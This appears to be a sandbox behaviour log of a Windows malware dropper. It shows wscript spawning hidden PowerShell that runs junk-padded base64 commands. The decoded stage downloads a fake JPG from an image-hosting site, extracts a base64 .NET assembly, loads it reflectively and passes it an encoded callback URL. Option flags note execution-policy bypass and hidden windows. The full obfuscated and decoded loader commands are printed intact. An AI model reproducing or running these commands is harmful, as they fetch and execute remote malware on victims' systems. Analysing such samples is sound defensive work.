SQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçFQBÇlkoçZQB4BÇlkoçHQBÇlkoçLgBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçTwBmBÇlkoçCgBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBGBÇlkoçGwBÇlkoçYQBnBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçHMBÇlkoçdBÇlkoçBhBÇlkoçHIBÇlkoçdBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGcBÇlkoçZQBÇlkoçgBÇlkoçDBÇlkoçBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGEBÇlkoçbgBkBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGcBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçgBÇlkoçCsBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçLgBMBÇlkoçGUBÇlkoçbgBnBÇlkoçHQBÇlkoçaBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçYgBhBÇlkoçHMBÇlkoçZQBÇlkoç2BÇlkoçDQBÇlkoçTBÇlkoçBlBÇlkoçG4BÇlkoçZwB0BÇlkoçGgBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBzBÇlkoçHQBÇlkoçYQByBÇlkoçHQBÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçDsBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBDBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçFQBÇlkoçZQB4BÇlkoçHQBÇlkoçLgBTBÇlkoçHUBÇlkoçYgBzBÇlkoçHQBÇlkoçcgBpBÇlkoçG4BÇlkoçZwBÇlkoçoBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBMBÇlkoçGUBÇlkoçbgBnBÇlkoçHQBÇlkoçaBÇlkoçBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçBjBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçQwBvBÇlkoçG4BÇlkoçdgBlBÇlkoçHIBÇlkoçdBÇlkoçBdBÇlkoçDoBÇlkoçOgBGBÇlkoçHIBÇlkoçbwBtBÇlkoçEIBÇlkoçYQBzBÇlkoçGUBÇlkoçNgBÇlkoç0BÇlkoçFMBÇlkoçdBÇlkoçByBÇlkoçGkBÇlkoçbgBnBÇlkoçCgBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBDBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçGwBÇlkoçbwBhBÇlkoçGQBÇlkoçZQBkBÇlkoçEEBÇlkoçcwBzBÇlkoçGUBÇlkoçbQBiBÇlkoçGwBÇlkoçeQBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçUgBlBÇlkoçGYBÇlkoçbBÇlkoçBlBÇlkoçGMBÇlkoçdBÇlkoçBpBÇlkoçG8BÇlkoçbgBÇlkoçuBÇlkoçEEBÇlkoçcwBzBÇlkoçGUBÇlkoçbQBiBÇlkoçGwBÇlkoçeQBdBÇlkoçDoBÇlkoçOgBMBÇlkoçG8BÇlkoçYQBkBÇlkoçCgBÇlkoçJBÇlkoçBjBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçB0BÇlkoçHkBÇlkoçcBÇlkoçBlBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçbBÇlkoçBvBÇlkoçGEBÇlkoçZBÇlkoçBlBÇlkoçGQBÇlkoçQQBzBÇlkoçHMBÇlkoçZQBtBÇlkoçGIBÇlkoçbBÇlkoçB5BÇlkoçC4BÇlkoçRwBlBÇlkoçHQBÇlkoçVBÇlkoçB5BÇlkoçHBÇlkoçBÇlkoçZQBÇlkoçoBÇlkoçCcBÇlkoçRgBpBÇlkoçGIBÇlkoçZQByBÇlkoçC4BÇlkoçSBÇlkoçBvBÇlkoçG0BÇlkoçZQBÇlkoçnBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçG0BÇlkoçZQB0BÇlkoçGgBÇlkoçbwBkBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçdBÇlkoçB5BÇlkoçHBÇlkoçBÇlkoçZQBÇlkoçuBÇlkoçEcBÇlkoçZQB0BÇlkoçE0BÇlkoçZQB0BÇlkoçGgBÇlkoçbwBkBÇlkoçCgBÇlkoçJwBWBÇlkoçEEBÇlkoçSQBÇlkoçnBÇlkoçCkBÇlkoçLgBJBÇlkoçG4BÇlkoçdgBvBÇlkoçGsBÇlkoçZQBÇlkoçoBÇlkoçCQBÇlkoçbgB1BÇlkoçGwBÇlkoçbBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçWwBvBÇlkoçGIBÇlkoçagBlBÇlkoçGMBÇlkoçdBÇlkoçBbBÇlkoçF0BÇlkoçXQBÇlkoçgBÇlkoçCgBÇlkoçJwBkBÇlkoçEgBÇlkoçaBÇlkoçBÇlkoçwBÇlkoçEwBÇlkoçbQBÇlkoçxBÇlkoçGkBÇlkoçYgB5BÇlkoçDgBÇlkoçeBÇlkoçBOBÇlkoçFMBÇlkoçNBÇlkoçB6BÇlkoçE0BÇlkoçeQBÇlkoç0BÇlkoçHkBÇlkoçTgBDBÇlkoçDQBÇlkoçegBPBÇlkoçFQBÇlkoçRQB2BÇlkoçEwBÇlkoçegBwBÇlkoçHcBÇlkoçZBÇlkoçBIBÇlkoçFIBÇlkoçbwBÇlkoçnBÇlkoçCBÇlkoçBÇlkoçLBÇlkoçBÇlkoçgBÇlkoçCcBÇlkoçZBÇlkoçBmBÇlkoçGQBÇlkoçZgBkBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGYBÇlkoçZBÇlkoçBmBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGYBÇlkoçZBÇlkoçBmBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGEBÇlkoçZBÇlkoçBzBÇlkoçGEBÇlkoçJwBÇlkoçgBÇlkoçCwBÇlkoçIBÇlkoçBÇlkoçnBÇlkoçGQBÇlkoçZQBÇlkoçnBÇlkoçCBÇlkoçBÇlkoçLBÇlkoçBÇlkoçgBÇlkoçCcBÇlkoçYwB1BÇlkoçCcBÇlkoçKQBÇlkoçpBÇlkoçBÇlkoç==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('BÇlkoç','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
parent_process wscript.exe martian_process powershell -command "$Codigo = 'JBÇlkoçBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçVQByBÇlkoçGwBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBoBÇlkoçHQBÇlkoçdBÇlkoçBwBÇlkoçHMBÇlkoçOgBÇlkoçvBÇlkoçC8BÇlkoçdQBwBÇlkoçGwBÇlkoçbwBhBÇlkoçGQBÇlkoçZBÇlkoçBlBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBuBÇlkoçHMBÇlkoçLgBjBÇlkoçG8BÇlkoçbQBÇlkoçuBÇlkoçGIBÇlkoçcgBÇlkoçvBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBzBÇlkoçC8BÇlkoçMBÇlkoçBÇlkoçwBÇlkoçDQBÇlkoçLwBÇlkoç2BÇlkoçDQBÇlkoçNBÇlkoçBÇlkoçvBÇlkoçDcBÇlkoçNBÇlkoçBÇlkoç5BÇlkoçC8BÇlkoçbwByBÇlkoçGkBÇlkoçZwBpBÇlkoçG4BÇlkoçYQBsBÇlkoçC8BÇlkoçbgBlBÇlkoçHcBÇlkoçXwBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçLgBqBÇlkoçHBÇlkoçBÇlkoçZwBÇlkoç/BÇlkoçDEBÇlkoçNgBÇlkoç5BÇlkoçDgBÇlkoçMBÇlkoçBÇlkoç4BÇlkoçDQBÇlkoçNQBÇlkoçyBÇlkoçDMBÇlkoçJwBÇlkoç7BÇlkoçCQBÇlkoçdwBlBÇlkoçGIBÇlkoçQwBsBÇlkoçGkBÇlkoçZQBuBÇlkoçHQBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçTgBlBÇlkoçHcBÇlkoçLQBPBÇlkoçGIBÇlkoçagBlBÇlkoçGMBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçTgBlBÇlkoçHQBÇlkoçLgBXBÇlkoçGUBÇlkoçYgBDBÇlkoçGwBÇlkoçaQBlBÇlkoçG4BÇlkoçdBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBÇlkoçkBÇlkoçHcBÇlkoçZQBiBÇlkoçEMBÇlkoçbBÇlkoçBpBÇlkoçGUBÇlkoçbgB0BÇlkoçC4BÇlkoçRBÇlkoçBvBÇlkoçHcBÇlkoçbgBsBÇlkoçG8BÇlkoçYQBkBÇlkoçEQBÇlkoçYQB0BÇlkoçGEBÇlkoçKBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBVBÇlkoçHIBÇlkoçbBÇlkoçBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçVBÇlkoçBlBÇlkoçHgBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçVBÇlkoçBlBÇlkoçHgBÇlkoçdBÇlkoçBÇlkoçuBÇlkoçEUBÇlkoçbgBjBÇlkoçG8BÇlkoçZBÇlkoçBpBÇlkoçG4BÇlkoçZwBdBÇlkoçDoBÇlkoçOgBVBÇlkoçFQBÇlkoçRgBÇlkoç4BÇlkoçC4BÇlkoçRwBlBÇlkoçHQBÇlkoçUwB0BÇlkoçHIBÇlkoçaQBuBÇlkoçGcBÇlkoçKBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBCBÇlkoçHkBÇlkoçdBÇlkoçBlBÇlkoçHMBÇlkoçKQBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBÇlkoç8BÇlkoçDwBÇlkoçQgBBBÇlkoçFMBÇlkoçRQBÇlkoç2BÇlkoçDQBÇlkoçXwBTBÇlkoçFQBÇlkoçQQBSBÇlkoçFQBÇlkoçPgBÇlkoç+BÇlkoçCcBÇlkoçOwBÇlkoçkBÇlkoçGUBÇlkoçbgBkBÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBÇlkoç8BÇlkoçDwBÇlkoçQgBBBÇlkoçFMBÇlkoçRQBÇlkoç2BÇlkoçDQBÇlkoçXwBFBÇlkoçE4BÇlkoçRBÇlkoçBÇlkoç+BÇlkoçD4BÇlkoçJwBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBUBÇlkoçGUBÇlkoçeBÇlkoçB0BÇlkoçC4BÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçE8BÇlkoçZgBÇlkoçoBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçKQBÇlkoç7BÇlkoçCQBÇlkoçZQBuBÇlkoçGQBÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçFQBÇlkoçZQB4BÇlkoçHQBÇlkoçLgBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçTwBmBÇlkoçCgBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBGBÇlkoçGwBÇlkoçYQBnBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçHMBÇlkoçdBÇlkoçBhBÇlkoçHIBÇlkoçdBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGcBÇlkoçZQBÇlkoçgBÇlkoçDBÇlkoçBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGEBÇlkoçbgBkBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGcBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçgBÇlkoçCsBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçLgBMBÇlkoçGUBÇlkoçbgBnBÇlkoçHQBÇlkoçaBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçYgBhBÇlkoçHMBÇlkoçZQBÇlkoç2BÇlkoçDQBÇlkoçTBÇlkoçBlBÇlkoçG4BÇlkoçZwB0BÇlkoçGgBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBzBÇlkoçHQBÇlkoçYQByBÇlkoçHQBÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçDsBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBDBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçFQBÇlkoçZQB4BÇlkoçHQBÇlkoçLgBTBÇlkoçHUBÇlkoçYgBzBÇlkoçHQBÇlkoçcgBpBÇlkoçG4BÇlkoçZwBÇlkoçoBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBMBÇlkoçGUBÇlkoçbgBnBÇlkoçHQBÇlkoçaBÇlkoçBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçBjBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçQwBvBÇlkoçG4BÇlkoçdgBlBÇlkoçHIBÇlkoçdBÇlkoçBdBÇlkoçDoBÇlkoçOgBGBÇlkoçHIBÇlkoçbwBtBÇlkoçEIBÇlkoçYQBzBÇlkoçGUBÇlkoçNgBÇlkoç0BÇlkoçFMBÇlkoçdBÇlkoçByBÇlkoçGkBÇlkoçbgBnBÇlkoçCgBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBDBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçGwBÇlkoçbwBhBÇlkoçGQBÇlkoçZQBkBÇlkoçEEBÇlkoçcwBzBÇlkoçGUBÇlkoçbQBiBÇlkoçGwBÇlkoçeQBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçUgBlBÇlkoçGYBÇlkoçbBÇlkoçBlBÇlkoçGMBÇlkoçdBÇlkoçBpBÇlkoçG8BÇlkoçbgBÇlkoçuBÇlkoçEEBÇlkoçcwBzBÇlkoçGUBÇlkoçbQBiBÇlkoçGwBÇlkoçeQBdBÇlkoçDoBÇlkoçOgBMBÇlkoçG8BÇlkoçYQBkBÇlkoçCgBÇlkoçJBÇlkoçBjBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçB0BÇlkoçHkBÇlkoçcBÇlkoçBlBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçbBÇlkoçBvBÇlkoçGEBÇlkoçZBÇlkoçBlBÇlkoçGQBÇlkoçQQBzBÇlkoçHMBÇlkoçZQBtBÇlkoçGIBÇlkoçbBÇlkoçB5BÇlkoçC4BÇlkoçRwBlBÇlkoçHQBÇlkoçVBÇlkoçB5BÇlkoçHBÇlkoçBÇlkoçZQBÇlkoçoBÇlkoçCcBÇlkoçRgBpBÇlkoçGIBÇlkoçZQByBÇlkoçC4BÇlkoçSBÇlkoçBvBÇlkoçG0BÇlkoçZQBÇlkoçnBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçG0BÇlkoçZQB0BÇlkoçGgBÇlkoçbwBkBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçdBÇlkoçB5BÇlkoçHBÇlkoçBÇlkoçZQBÇlkoçuBÇlkoçEcBÇlkoçZQB0BÇlkoçE0BÇlkoçZQB0BÇlkoçGgBÇlkoçbwBkBÇlkoçCgBÇlkoçJwBWBÇlkoçEEBÇlkoçSQBÇlkoçnBÇlkoçCkBÇlkoçLgBJBÇlkoçG4BÇlkoçdgBvBÇlkoçGsBÇlkoçZQBÇlkoçoBÇlkoçCQBÇlkoçbgB1BÇlkoçGwBÇlkoçbBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçWwBvBÇlkoçGIBÇlkoçagBlBÇlkoçGMBÇlkoçdBÇlkoçBbBÇlkoçF0BÇlkoçXQBÇlkoçgBÇlkoçCgBÇlkoçJwBkBÇlkoçEgBÇlkoçaBÇlkoçBÇlkoçwBÇlkoçEwBÇlkoçbQBÇlkoçxBÇlkoçGkBÇlkoçYgB5BÇlkoçDgBÇlkoçeBÇlkoçBOBÇlkoçFMBÇlkoçNBÇlkoçB6BÇlkoçE0BÇlkoçeQBÇlkoç0BÇlkoçHkBÇlkoçTgBDBÇlkoçDQBÇlkoçegBPBÇlkoçFQBÇlkoçRQB2BÇlkoçEwBÇlkoçegBwBÇlkoçHcBÇlkoçZBÇlkoçBIBÇlkoçFIBÇlkoçbwBÇlkoçnBÇlkoçCBÇlkoçBÇlkoçLBÇlkoçBÇlkoçgBÇlkoçCcBÇlkoçZBÇlkoçBmBÇlkoçGQBÇlkoçZgBkBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGYBÇlkoçZBÇlkoçBmBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGYBÇlkoçZBÇlkoçBmBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGEBÇlkoçZBÇlkoçBzBÇlkoçGEBÇlkoçJwBÇlkoçgBÇlkoçCwBÇlkoçIBÇlkoçBÇlkoçnBÇlkoçGQBÇlkoçZQBÇlkoçnBÇlkoçCBÇlkoçBÇlkoçLBÇlkoçBÇlkoçgBÇlkoçCcBÇlkoçYwB1BÇlkoçCcBÇlkoçKQBÇlkoçpBÇlkoçBÇlkoç==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('BÇlkoç','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/644/749/original/new_image.jpg?1698084523';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0Lm1iby8xNS4zMy4yNC4zOTEvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
option -executionpolicy bypass value Attempts to bypass execution policy
option -noprofile value Does not load current user profile
option -windowstyle hidden value Attempts to execute command with a hidden window
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe